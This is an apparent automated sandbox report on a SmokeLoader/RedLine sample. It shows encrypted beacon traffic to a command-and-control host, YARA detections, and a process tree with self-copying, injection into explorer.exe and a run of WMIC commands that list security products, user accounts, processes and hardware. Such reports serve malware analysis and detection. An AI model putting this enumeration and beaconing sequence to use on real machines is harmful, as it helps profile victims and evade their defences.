                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-09-30 13:41:22 UTC289OUTPOST /search.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: https://wwkvkysjcmxmifd.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: calvinandhalls.com
                                                                                                                                                              2024-09-30 13:41:22 UTC109OUTData Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                                                                                              Data Ascii: ryid8a(f|5r2,)%P g3iqH[CLk4%<2eQvb%;=j ,
                                                                                                                                                              2024-09-30 13:41:22 UTC285INHTTP/1.1 404 Not Found
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:41:22 GMT
                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Content-Length: 7
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              2024-09-30 13:41:22 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                                                                                              Data Ascii:


                                                                                                                                                              Click to jump to process

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Target ID:0
                                                                                                                                                              Start time:09:37:19
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Users\user\Desktop\OCYe9qcxiM.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\Desktop\OCYe9qcxiM.exe"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:245'760 bytes
                                                                                                                                                              MD5 hash:2A6994149BAFF1E680719F89062BFCC7
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1519967739.000000000078F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1520041512.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:2
                                                                                                                                                              Start time:09:37:30
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                              Imagebase:0x7ff62d7d0000
                                                                                                                                                              File size:5'141'208 bytes
                                                                                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:4
                                                                                                                                                              Start time:09:37:50
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\hehcrfb
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\hehcrfb
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:245'760 bytes
                                                                                                                                                              MD5 hash:2A6994149BAFF1E680719F89062BFCC7
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.1809320353.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.1809489759.000000000063E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                              Antivirus matches:
                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                              • Detection: 37%, ReversingLabs
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:7
                                                                                                                                                              Start time:09:38:15
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\4470.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\4470.exe
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:245'248 bytes
                                                                                                                                                              MD5 hash:D07C1E0124B1CFA23AA3699216AA912F
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.2067784518.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000003.2015538177.0000000002170000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.2067712558.00000000006CD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                              Antivirus matches:
                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:8
                                                                                                                                                              Start time:09:38:44
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\fihcrfb
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\fihcrfb
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:245'248 bytes
                                                                                                                                                              MD5 hash:D07C1E0124B1CFA23AA3699216AA912F
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.2357152102.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000003.2301467371.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.2358138037.000000000070D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                              Antivirus matches:
                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:9
                                                                                                                                                              Start time:09:38:54
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\354F.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\354F.exe
                                                                                                                                                              Imagebase:0x7ff780b60000
                                                                                                                                                              File size:78'336 bytes
                                                                                                                                                              MD5 hash:815279E7D757D334D6E9EF9B249CA705
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Antivirus matches:
                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:10
                                                                                                                                                              Start time:09:38:55
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                              Imagebase:0x7ff6fed00000
                                                                                                                                                              File size:69'632 bytes
                                                                                                                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:11
                                                                                                                                                              Start time:09:38:56
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Imagebase:0xe60000
                                                                                                                                                              File size:4'514'184 bytes
                                                                                                                                                              MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:moderate
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:13
                                                                                                                                                              Start time:09:38:57
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\explorer.exe
                                                                                                                                                              Imagebase:0x7ff62d7d0000
                                                                                                                                                              File size:5'141'208 bytes
                                                                                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:14
                                                                                                                                                              Start time:09:38:58
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Imagebase:0xe60000
                                                                                                                                                              File size:4'514'184 bytes
                                                                                                                                                              MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Reputation:moderate
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:15
                                                                                                                                                              Start time:09:39:00
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\explorer.exe
                                                                                                                                                              Imagebase:0x7ff62d7d0000
                                                                                                                                                              File size:5'141'208 bytes
                                                                                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.3873306436.0000000000351000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:16
                                                                                                                                                              Start time:09:39:01
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Imagebase:0xe60000
                                                                                                                                                              File size:4'514'184 bytes
                                                                                                                                                              MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:moderate
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:17
                                                                                                                                                              Start time:09:39:02
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\explorer.exe
                                                                                                                                                              Imagebase:0x7ff62d7d0000
                                                                                                                                                              File size:5'141'208 bytes
                                                                                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:19
                                                                                                                                                              Start time:09:39:14
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:cmd
                                                                                                                                                              Imagebase:0x7ff7c2c50000
                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:20
                                                                                                                                                              Start time:09:39:14
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:21
                                                                                                                                                              Start time:09:39:15
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
                                                                                                                                                              Imagebase:0x7ff6cc730000
                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:22
                                                                                                                                                              Start time:09:39:17
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
                                                                                                                                                              Imagebase:0x7ff6cc730000
                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:23
                                                                                                                                                              Start time:09:39:19
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
                                                                                                                                                              Imagebase:0x7ff6cc730000
                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:24
                                                                                                                                                              Start time:09:39:20
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
                                                                                                                                                              Imagebase:0x7ff6cc730000
                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:25
                                                                                                                                                              Start time:09:39:22
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
                                                                                                                                                              Imagebase:0x7ff6cc730000
                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:26
                                                                                                                                                              Start time:09:39:25
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
                                                                                                                                                              Imagebase:0x7ff6cc730000
                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:27
                                                                                                                                                              Start time:09:39:27
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
                                                                                                                                                              Imagebase:0x7ff6cc730000
                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:28
                                                                                                                                                              Start time:09:39:29
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
                                                                                                                                                              Imagebase:0x7ff6cc730000
                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:29
                                                                                                                                                              Start time:09:39:32
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
                                                                                                                                                              Imagebase:0x7ff6cc730000
                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:30
                                                                                                                                                              Start time:09:39:40
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
                                                                                                                                                              Imagebase:0x7ff6cc730000
                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:31
                                                                                                                                                              Start time:09:39:44
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
                                                                                                                                                              Imagebase:0x7ff6cc730000
                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:32
                                                                                                                                                              Start time:09:39:54
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
                                                                                                                                                              Imagebase:0x7ff6cc730000
                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:33
                                                                                                                                                              Start time:09:40:01
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\hehcrfb
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\hehcrfb
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:245'760 bytes
                                                                                                                                                              MD5 hash:2A6994149BAFF1E680719F89062BFCC7
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:34
                                                                                                                                                              Start time:09:40:01
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\fihcrfb
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\fihcrfb
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:245'248 bytes
                                                                                                                                                              MD5 hash:D07C1E0124B1CFA23AA3699216AA912F
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:35
                                                                                                                                                              Start time:09:40:10
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
                                                                                                                                                              Imagebase:0x7ff6cc730000
                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:36
                                                                                                                                                              Start time:09:40:14
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
                                                                                                                                                              Imagebase:0x7ff6cc730000
                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
